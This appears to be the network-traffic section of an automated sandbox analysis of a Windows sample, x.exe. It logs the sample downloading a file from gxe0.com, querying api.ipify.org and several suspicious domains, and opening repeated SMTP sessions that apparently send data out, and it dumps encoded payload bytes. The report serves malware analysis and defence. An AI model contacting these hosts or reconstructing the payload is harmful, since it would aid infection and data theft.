                                                                                                              Nov 12, 2024 15:57:55.189371109 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:22.777188063 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:22.782727003 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:23.022133112 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:23.022981882 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:23.029316902 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:23.034291983 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:23.034595966 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:23.840064049 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:23.840249062 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:23.845065117 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.083244085 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.083436966 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:24.091084957 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.324368954 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.324960947 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:24.329741955 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.571290016 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.571317911 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.571332932 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.571343899 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.571377993 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:24.571407080 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:24.572948933 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:24.577811003 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.813679934 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:24.827250957 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:24.832087994 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.068413019 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.069725990 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:25.076510906 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.311214924 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.311633110 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:25.316464901 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.555753946 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.556008101 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:25.560842037 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.795202017 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:25.798254013 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:25.803210020 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.041300058 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.041557074 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.046367884 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.288368940 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.288707972 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.288757086 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.288784027 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.288834095 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.290261030 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.293932915 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.293943882 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.293957949 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.293967009 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.293986082 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.294013023 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.295187950 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295243979 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295248032 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.295253992 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295262098 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295310974 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.295331001 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.295340061 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295383930 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.295411110 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295418978 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295428991 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295444012 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.295453072 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.295475006 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.295490026 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.298985004 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.299048901 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.299137115 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.299189091 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.300234079 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.300287962 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.301101923 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.301213980 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.304075956 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.304140091 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.304991961 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.305053949 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.305208921 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.305257082 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.306191921 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306257963 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:58:26.306418896 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306473970 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306483984 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306509972 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306591988 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306602001 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306606054 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306619883 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306628942 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306653976 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306714058 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306724072 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306732893 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.306746006 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.309199095 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310056925 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310079098 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310089111 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310126066 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310142994 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310353041 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310363054 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310898066 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310946941 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310956955 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.310983896 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.311362982 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.311408043 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.794536114 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:58:26.892441988 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:59:12.397200108 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:59:12.402515888 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:59:12.642577887 CET5874999951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:59:12.643079042 CET49999587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:59:12.643441916 CET50001587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:59:12.648628950 CET5875000151.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:59:12.648725986 CET50001587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:59:13.484740019 CET5875000151.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:59:13.484862089 CET50001587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:59:13.489654064 CET5875000151.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:59:14.074748993 CET5875000151.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:59:14.126910925 CET50001587192.168.2.651.195.88.199

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 12, 2024 15:55:01.180349112 CET5509653192.168.2.61.1.1.1
                                                                                                              Nov 12, 2024 15:55:01.427781105 CET53550961.1.1.1192.168.2.6
                                                                                                              Nov 12, 2024 15:55:09.795057058 CET5156753192.168.2.61.1.1.1
                                                                                                              Nov 12, 2024 15:55:09.802222967 CET53515671.1.1.1192.168.2.6
                                                                                                              Nov 12, 2024 15:55:12.558748007 CET5371653192.168.2.61.1.1.1
                                                                                                              Nov 12, 2024 15:55:12.914112091 CET53537161.1.1.1192.168.2.6
                                                                                                              Nov 12, 2024 15:55:31.573256016 CET6463453192.168.2.61.1.1.1
                                                                                                              Nov 12, 2024 15:55:31.581523895 CET53646341.1.1.1192.168.2.6

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Nov 12, 2024 15:55:01.180349112 CET192.168.2.61.1.1.10x7f0cStandard query (0)gxe0.comA (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:09.795057058 CET192.168.2.61.1.1.10x1891Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:12.558748007 CET192.168.2.61.1.1.10xefb2Standard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:31.573256016 CET192.168.2.61.1.1.10xd3cfStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Nov 12, 2024 15:55:01.427781105 CET1.1.1.1192.168.2.60x7f0cNo error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:09.802222967 CET1.1.1.1192.168.2.60x1891No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:09.802222967 CET1.1.1.1192.168.2.60x1891No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:09.802222967 CET1.1.1.1192.168.2.60x1891No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:12.914112091 CET1.1.1.1192.168.2.60xefb2No error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                              Nov 12, 2024 15:55:31.581523895 CET1.1.1.1192.168.2.60xd3cfNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • gxe0.com
                                                                                                              • api.ipify.org

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.649710198.252.105.914436332C:\Users\user\Desktop\x.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-12 14:55:02 UTC161OUTGET /yak/233_Wisrysxlfss HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                              Host: gxe0.com
                                                                                                              2024-11-12 14:55:02 UTC365INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              last-modified: Mon, 28 Oct 2024 23:14:08 GMT
                                                                                                              accept-ranges: bytes
                                                                                                              content-length: 2562520
                                                                                                              date: Tue, 12 Nov 2024 14:55:02 GMT
                                                                                                              server: LiteSpeed
                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65
                                                                                                              Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79
                                                                                                              Data Ascii: q6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61
                                                                                                              Data Ascii: s7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f
                                                                                                              Data Ascii: n7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqO
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d
                                                                                                              Data Ascii: qKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprm
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65
                                                                                                              Data Ascii: sLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53
                                                                                                              Data Ascii: u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKS
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69
                                                                                                              Data Ascii: q6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6i
